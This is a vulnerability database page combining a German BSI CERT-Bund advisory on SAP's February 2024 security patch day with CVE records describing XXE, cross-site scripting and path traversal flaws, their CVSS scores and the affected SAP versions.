Action not permitted
Modal body text goes here.
Modal Title
Modal Body
wid-sec-w-2024-0355
Vulnerability from csaf_certbund
Published
2024-02-12 23:00
Modified
2024-02-12 23:00
Summary
SAP Software: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
SAP stellt unternehmensweite Lösungen für Geschäftsprozesse wie Buchführung, Vertrieb, Einkauf und Lagerhaltung zur Verfügung.
Angriff
Ein entfernter Angreifer kann mehrere Schwachstellen in der SAP-Software ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site Scripting (XSS)-Angriffe durchzuführen.
Betroffene Betriebssysteme
- UNIX
- Linux
- Windows
{ document: { aggregate_severity: { text: "hoch", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "SAP stellt unternehmensweite Lösungen für Geschäftsprozesse wie Buchführung, Vertrieb, Einkauf und Lagerhaltung zur Verfügung.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter Angreifer kann mehrere Schwachstellen in der SAP-Software ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site Scripting (XSS)-Angriffe durchzuführen.", title: "Angriff", }, { category: "general", text: "- UNIX\n- Linux\n- Windows", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2024-0355 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0355.json", }, { category: "self", summary: "WID-SEC-2024-0355 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0355", }, { category: "external", summary: "SAP Security Patch Day – February 2024 vom 2024-02-12", url: "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/february-2024.html", }, ], source_lang: "en-US", title: "SAP Software: Mehrere Schwachstellen", tracking: { current_release_date: "2024-02-12T23:00:00.000+00:00", generator: { date: "2024-08-15T18:05:07.923+00:00", engine: { name: "BSI-WID", version: "1.3.5", }, }, id: "WID-SEC-W-2024-0355", initial_release_date: "2024-02-12T23:00:00.000+00:00", revision_history: [ { date: "2024-02-12T23:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { category: "product_name", name: "SAP Software", product: { name: "SAP Software", product_id: "T032707", product_identification_helper: { cpe: "cpe:/a:sap:sap:-", }, }, }, ], category: "vendor", name: "SAP", }, ], }, vulnerabilities: [ { cve: "CVE-2024-25643", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-25643", }, { cve: "CVE-2024-25642", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-25642", }, { cve: "CVE-2024-24743", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-24743", }, { cve: "CVE-2024-24742", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-24742", }, { cve: "CVE-2024-24741", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-24741", }, { cve: "CVE-2024-24740", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-24740", }, { cve: "CVE-2024-24739", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-24739", }, { cve: "CVE-2024-22132", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22132", }, { cve: "CVE-2024-22131", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22131", }, { cve: "CVE-2024-22130", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22130", }, { cve: "CVE-2024-22129", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22129", }, { cve: "CVE-2024-22128", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22128", }, { cve: "CVE-2024-22126", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2024-22126", }, { cve: "CVE-2023-49580", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2023-49580", }, { cve: "CVE-2023-49058", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in SAP-Software. Diese Fehler bestehen in mehreren Subsystemen, Komponenten und Modulen wie WebClient UI, Bank Account Management, Cloud Connector oder NetWeaver aufgrund mehrerer sicherheitsrelevanter Probleme wie einer nicht ordnungsgemäßen Zertifikatsvalidierung, einer fehlenden Berechtigungsprüfung oder Problemen beim Directory Traversal. Ein entfernter Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren oder Cross-Site-Scripting (XSS)-Angriffe durchzuführen. Einige der Schwachstellen erfordern eine Interaktion des Benutzers, um sie erfolgreich auszunutzen.", }, ], product_status: { known_affected: [ "T032707", ], }, release_date: "2024-02-12T23:00:00.000+00:00", title: "CVE-2023-49058", }, ], }
cve-2024-24743
Vulnerability from cvelistv5
Published
2024-02-13 02:43
Modified
2024-11-07 19:10
Severity ?
Summary
SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver AS Java (Guided Procedures) |
Version: 7.50 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:28:11.817Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3426111", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2024-24743", options: [ { Exploitation: "none", }, { Automatable: "yes", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-13T15:39:45.926455Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-11-07T19:10:20.078Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP NetWeaver AS Java (Guided Procedures)", vendor: "SAP_SE", versions: [ { status: "affected", version: "7.50", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.</p>", }, ], value: "SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 8.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-611", description: "CWE-611: Improper Restriction of XML External Entity Reference", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:43:40.755Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3426111", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "XXE vulnerability in SAP NetWeaver AS Java (Guided Procedures)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24743", datePublished: "2024-02-13T02:43:40.755Z", dateReserved: "2024-01-29T05:13:46.618Z", dateUpdated: "2024-11-07T19:10:20.078Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22128
Vulnerability from cvelistv5
Published
2024-02-13 02:02
Modified
2024-08-01 22:35
Severity ?
EPSS score ?
Summary
SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver Business Client for HTML |
Version: SAP_UI 754 Version: SAP_UI 755 Version: SAP_UI 756 Version: SAP_UI 757 Version: SAP_UI 758 Version: SAP_BASIS 700 Version: SAP_BASIS 701 Version: SAP_BASIS 702 Version: SAP_BASIS 731 |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22128", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-13T15:55:00.643408Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:52:30.808Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.814Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3396109", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP NetWeaver Business Client for HTML", vendor: "SAP_SE", versions: [ { status: "affected", version: "SAP_UI 754", }, { status: "affected", version: "SAP_UI 755", }, { status: "affected", version: "SAP_UI 756", }, { status: "affected", version: "SAP_UI 757", }, { status: "affected", version: "SAP_UI 758", }, { status: "affected", version: "SAP_BASIS 700", }, { status: "affected", version: "SAP_BASIS 701", }, { status: "affected", version: "SAP_BASIS 702", }, { status: "affected", version: "SAP_BASIS 731", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation.</p>", }, ], value: "SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.7, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:02:14.281Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3396109", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Business Client for HTML", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22128", datePublished: "2024-02-13T02:02:14.281Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.814Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2023-49058
Vulnerability from cvelistv5
Published
2023-12-12 01:01
Modified
2024-08-02 21:46
Severity ?
EPSS score ?
Summary
SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP Master Data Governance |
Version: MDG_FND 731 Version: MDG_FND 732 Version: MDG_FND 746 Version: MDG_FND 747 Version: MDG_FND 748 Version: MDG_FND 749 Version: MDG_FND 752 Version: MDG_FND 800 Version: MDG_FND 802 Version: MDG_FND 803 Version: MDG_FND 804 Version: MDG_FND 805 Version: MDG_FND 806 Version: MDG_FND 807 Version: MDG_FND 808 Version: SAP_BS_FND 702 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-02T21:46:29.250Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3363690", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Master Data Governance", vendor: "SAP_SE", versions: [ { status: "affected", version: "MDG_FND 731", }, { status: "affected", version: "MDG_FND 732", }, { status: "affected", version: "MDG_FND 746", }, { status: "affected", version: "MDG_FND 747", }, { status: "affected", version: "MDG_FND 748", }, { status: "affected", version: "MDG_FND 749", }, { status: "affected", version: "MDG_FND 752", }, { status: "affected", version: "MDG_FND 800", }, { status: "affected", version: "MDG_FND 802", }, { status: "affected", version: "MDG_FND 803", }, { status: "affected", version: "MDG_FND 804", }, { status: "affected", version: "MDG_FND 805", }, { status: "affected", version: "MDG_FND 806", }, { status: "affected", version: "MDG_FND 807", }, { status: "affected", version: "MDG_FND 808", }, { status: "affected", version: "SAP_BS_FND 702", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality.</p>", }, ], value: "SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 3.5, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-22", description: "CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal)", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-12-12T01:01:07.964Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3363690", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Directory Traversal vulnerability in SAP Master Data Governance", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2023-49058", datePublished: "2023-12-12T01:01:07.964Z", dateReserved: "2023-11-20T11:31:43.313Z", dateUpdated: "2024-08-02T21:46:29.250Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22126
Vulnerability from cvelistv5
Published
2024-02-13 01:58
Modified
2025-02-11 04:13
Severity ?
EPSS score ?
Summary
The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver AS Java (User Admin Application) |
Version: 7.50 |
